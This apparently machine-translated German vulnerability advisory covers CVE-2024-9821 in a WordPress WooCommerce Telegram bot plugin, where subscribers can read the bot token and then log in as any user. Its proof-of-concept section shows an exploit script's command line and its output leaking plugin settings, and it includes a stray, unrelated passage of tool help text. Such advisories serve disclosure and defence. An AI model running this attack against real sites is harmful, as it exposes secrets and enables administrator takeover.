
Bot für Telegram auf WooCommerce <= 1.2.4 - Authentifizierte (Subscriber+) Offenlegung des Telegram-Bot-Tokens zur Authentifizierungsumgehung
Bot for Telegram on WooCommerce <= 1.2.4 - Authentifizierte (Subscriber+) Offenlegung des Telegram-Bot-Tokens mit anschließender Authentifizierungsumgehung
Das Plugin Bot for Telegram on WooCommerce für WordPress ist anfällig für die Offenlegung sensibler Informationen aufgrund fehlender Autorisierungsprüfungen in der AJAX-Aktion 'stm_wpcfto_get_settings' in allen Versionen bis einschließlich 1.2.4. Dadurch ist es authentifizierten Angreifern mit Zugriff auf Subscriber-Ebene und höher möglich, das Telegram-Bot-Token einzusehen – ein geheimes Token zur Steuerung des Bots –, das anschließend verwendet werden kann, um sich dank der Funktion Login with Telegram als jeder vorhandene Benutzer der Website anzumelden, etwa als Administrator, sofern sie den Benutzernamen kennen.``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821
* Slug: [bot-for-telegram-on-woocommerce](https://wordpress.org/plugin/bot-for-telegram-on-woocommerce)
* Download-Link: [Download bot-for-telegram-on-woocommerce Version 1.2.4](https://downloads.wordpress.org/plugin/bot-for-telegram-on-woocommerce.zip)
POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user
[...]
Wenn Sie -ov {name} setzen, fügen wir dem Ausgabevariablen das Tag {name}_output hinzu, um die Tags unterscheiden zu können.
Jetzt können Sie anstelle von -m {module} -m {module}:{tag} und als -p verwenden```
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
{ 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram '
'Bot Token',
'type': 'text',
'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'},
'bftow_bot_name': { 'description': 'Set '
'if '
'you '
'want '
'user '
'to '
'get '
'back '
'to '
'Telegram '
'after '
'successful '
'checkout. '
'(Without '
'"@")',
'label': 'Telegram '
'Bot Name',
'type': 'text',
'value': 'Superbotman'},
'bftow_buttons': { 'description': 'Save '
'BOT '
'Token '
'first',
'label': 'Activate '
'API URL',
'type': 'bftow_webhook_activation',
'value': ''},
'bftow_google_maps_api_key': { 'description': '<a '
'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide '
'Google '
'Maps '
'API '
'key '
'with '
'enabled '
'geocoding '
'API '
'and '
'configured '
'billing '
'account. '
'If '
'you '
'leave '
'this '
'field '
'empty, '
'the '
'location '
'will '
'be '
'taken '
'via '
'openstreetmap',
'label': 'Google '
'Maps '
'API '
'key',
'pro': True,
'type': 'text',
'value': ''},
'bftow_proxy_server': { 'label': 'Proxy '
'server',
'type': 'text',
'value': 'https://api.telegram.org/bot'}},
'name': 'BOT API Settings'},
'interface_settings': { 'fields': { 'bftow_cart_on_site': { 'description': 'if '
'enabled '